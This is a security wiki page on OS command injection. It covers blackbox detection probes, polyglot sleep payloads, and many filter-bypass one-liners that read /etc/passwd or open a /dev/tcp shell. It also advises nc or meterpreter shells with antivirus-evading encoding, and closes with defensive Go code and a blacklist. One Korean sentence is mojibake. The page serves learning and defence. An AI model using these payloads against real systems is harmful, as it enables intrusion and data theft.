
Command Injection

🔍 Introduction

Command Injection refers to an attack technique in which an attacker executes commands of their choosing through injection, in cases where an application has a part that uses OS commands such as system calls, or where the application layer itself can process separate commands.

🗡 Offensive techniques

Detect

In whitebox or graybox testing, where the source code is available, this is easy to find by focusing the analysis on functions that process commands, such as exec. When the test must be done fully blackbox, however, identifying this area is not easy.

Through fuzzing, send requests that could affect command injection, and identify whether the backend has a part that processes commands by looking at the resulting response and response time.

# Original
/proc?filename=test.txt

# Backend
exec("cat "+filename)

/proc?filename=test.txt`ping -c 5 127.0.0.1`
/proc?filename=test.txt$(ping -c 5 127.0.0.1)
/proc?filename=test.txt|ping -c 5 127.0.0.1|
/proc?filename=test.txt&ping -c 5 127.0.0.1&
/proc?filename=test.txt\nping -c 5 127.0.0.1\n
/proc?filename=test.txt>ping -c 5 127.0.0.1>
/proc?filename=test.txt<ping -c 5 127.0.0.1>
/proc?filename=test.txt-ping -c 5 127.0.0.1
/proc?filename=test.txt;ping -c 5 127.0.0.1;
etc...

If the backend passes filename to the CLI, the special-character syntax above causes the attacker's intended command ping -c 5 127.0.0.1 to run; since this pings localhost 5 times, a delay of 5 seconds occurs. In such cases, checking the response time tells you whether the command was actually executed.

(Personally, since there were also many Blind RCE cases, a time-based check using ping or sleep was the most accurate.)

Sometimes an application takes the command itself from a parameter. Such cases are easy to identify.

/proc?cmd=curl%20api-server.domain/check

Polyglot payload

# case 1
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

# e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

# case 2
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

# e.g:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'

Exploitation

Since commands can be executed, you can retrieve sensitive information from the OS or drop a shell and carry out further attacks. There are many ways to get a shell, but the simple ones are to make something like nc listen and then connect to it to use the shell, or to use Metasploit to drop a shell. Metasploit's meterpreter shell makes lateral movement from the target system easier, so if you proceed as far as internal penetration, the meterpreter shell is recommended. (Of course, you would need to encode the payload well so that antivirus does not catch it.)

Bypass protection

Bypass without space

linux

$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash

$ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

$ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

$ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu

$ sh</dev/tcp/127.0.0.1/4242

$ IFS=,;`cat<<<uname,-a`

Windows

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Bypass with a line return

something%0Acat%20/etc/passwd

Bypass characters filter via hex encoding

Linux

$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd

$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash

$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash

$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash

$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd

$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash

$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd

$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash

Bypass characters filter

$ echo ${HOME:0:1}
/

$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash

$ echo . | tr '!-0' '"-1'
/

$ tr '!-0' '"-1' <<< .
/

$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash

Bypass Blacklisted words

single quote

w'h'o'am'i

double quote

w"h"o"am"i

backslash

w\ho\am\i
/\b\i\n/////s\h

$@

who$@ami

echo $0
-> /usr/bin/zsh
echo whoami|$0

???

/???/??t /???/p??s??

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

wildcard(*)

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
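A defender-side counterpart to the probes and filter bypasses above, as an added example that is not part of the original page: a small Go inspector that URL-decodes each query key and value of a logged request path and flags the metacharacter and bypass patterns shown in this section (;, |, backticks, $( ), %0A line returns, ${IFS}, ${HOME:0:1} substring expansion, $'\x..' hex strings, brace expansion). The request lines it is tested with are constructed, and the pattern list is a heuristic for alerting, not a complete filter.

```go
package main

import (
	"net/url"
	"regexp"
	"strings"
)

// Patterns taken from the probes and filter bypasses shown on this page.
// They run against URL-decoded text, so %0A, %20 and %24 hide nothing.
var shellPatterns = []*regexp.Regexp{
	regexp.MustCompile("[;|&`]"),               // separators and backticks
	regexp.MustCompile(`\$\(`),                 // $( ... ) substitution
	regexp.MustCompile(`[\r\n]`),               // line return (%0A) bypass
	regexp.MustCompile(`\$\{?IFS`),             // $IFS / ${IFS} no-space bypass
	regexp.MustCompile(`\$\{\w+:\d+:\d+\}`),    // ${HOME:0:1} substring tricks
	regexp.MustCompile(`\$'\\x[0-9a-fA-F]{2}`), // $'\x2f..' hex-encoded strings
	regexp.MustCompile(`\{[^}]*,[^}]*\}`),      // {cat,/etc/passwd} brace expansion
	regexp.MustCompile(`</dev/tcp/`),           // bash /dev/tcp redirection
}

// Finding records one decoded query field that matched a pattern.
type Finding struct {
	Field, Decoded, Pattern string
}

// Inspect scans the query string of a logged request path and returns one
// finding per key or value that matches. The query is split by hand because
// url.Query() silently drops pairs containing ';' since Go 1.17.
func Inspect(rawPath string) []Finding {
	var out []Finding
	parts := strings.SplitN(rawPath, "?", 2)
	if len(parts) != 2 {
		return out
	}
	for _, pair := range strings.Split(parts[1], "&") {
		for _, field := range strings.SplitN(pair, "=", 2) {
			dec, err := url.QueryUnescape(field)
			if err != nil {
				dec = field // malformed encoding: inspect the raw text instead
			}
			for _, re := range shellPatterns {
				if re.MatchString(dec) {
					out = append(out, Finding{field, dec, re.String()})
					break
				}
			}
		}
	}
	return out
}
```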

🛡 Defensive techniques

Usually, when a service has to use system calls and the like, the response is either to use the application library's features so that, like a sandbox, user input cannot pass through into the shell, or to filter the special characters used in attacks.

Library protection

// Go's representative exec defense
// In this case, no matter what special characters are put into filename to try to run a separate command, it is only handled as an argument under cat.
cmd := exec.Command("cat", filename)
err := cmd.Start()

However, because this approach is usually inconvenient during development, when commands are received dynamically it is also common to handle them with bash -c or similar, as below. (Such cases would be vulnerable.)

cmd := exec.Command("bash", "-c", afterCmd)
err := cmd.Start()

Escape special chars

ํŠน์ˆ˜๋ฌธ์ž ์ œํ•œ์˜ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์— ์ฃผ๋กœ ์‚ฌ์šฉ๋˜๋Š” ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•ด ์ œํ•œํ•˜๋Š” ํ˜•ํƒœ๋กœ ์ฒ˜๋ฆฌ๋ฉ๋‹ˆ๋‹ค.

  • |
  • $
  • (
  • )
  • &
  • \r\n (CRLF)
  • >
  • <
  • -
  • ;
  • etc.
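To tie the library protection above to the special-character list, here is an added Go example (not the page's own code) that keeps the page's exec.Command("cat", filename) form and, instead of blacklisting the characters listed, allowlists filename to a bare file name inside a base directory. The directory, the sample file and the helper names (ValidateFilename, BuildCat, SafeCat) are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"regexp"
)

// Allowlist for the filename parameter: accept only a bare file name instead of
// blacklisting metacharacters, which the bypass section shows can be swapped out.
var safeName = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$`)

var ErrBadFilename = errors.New("filename rejected by allowlist")

// ValidateFilename returns the path of name inside baseDir, or ErrBadFilename;
// separators, a leading '.', ".." and shell metacharacters cannot pass the regexp.
func ValidateFilename(baseDir, name string) (string, error) {
	if !safeName.MatchString(name) {
		return "", ErrBadFilename
	}
	return filepath.Join(baseDir, name), nil
}

// BuildCat mirrors the page's exec.Command("cat", filename): no shell is
// involved, so the whole value travels as one argv entry, never as syntax.
func BuildCat(path string) *exec.Cmd {
	return exec.Command("cat", path)
}

// SafeCat validates first, then runs cat without a shell and returns its output.
func SafeCat(baseDir, name string) ([]byte, error) {
	path, err := ValidateFilename(baseDir, name)
	if err != nil {
		return nil, err
	}
	return BuildCat(path).Output()
}

func main() {
	dir, _ := os.MkdirTemp("", "cmdinj") // constructed sample directory
	defer os.RemoveAll(dir)
	os.WriteFile(filepath.Join(dir, "test.txt"), []byte("hello\n"), 0o600)
	out, err := SafeCat(dir, "test.txt")
	fmt.Printf("%q %v\n", out, err) // "hello\n" <nil>
	_, err = SafeCat(dir, "test.txt;ping -c 5 127.0.0.1;")
	fmt.Println(err) // filename rejected by allowlist
	fmt.Printf("%q\n", BuildCat("test.txt;ping -c 5 127.0.0.1;").Args) // one literal argument
}
```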

🕹 Tools

📚 Articles

📌 References

Licensed under CC BY-NC-SA 4.0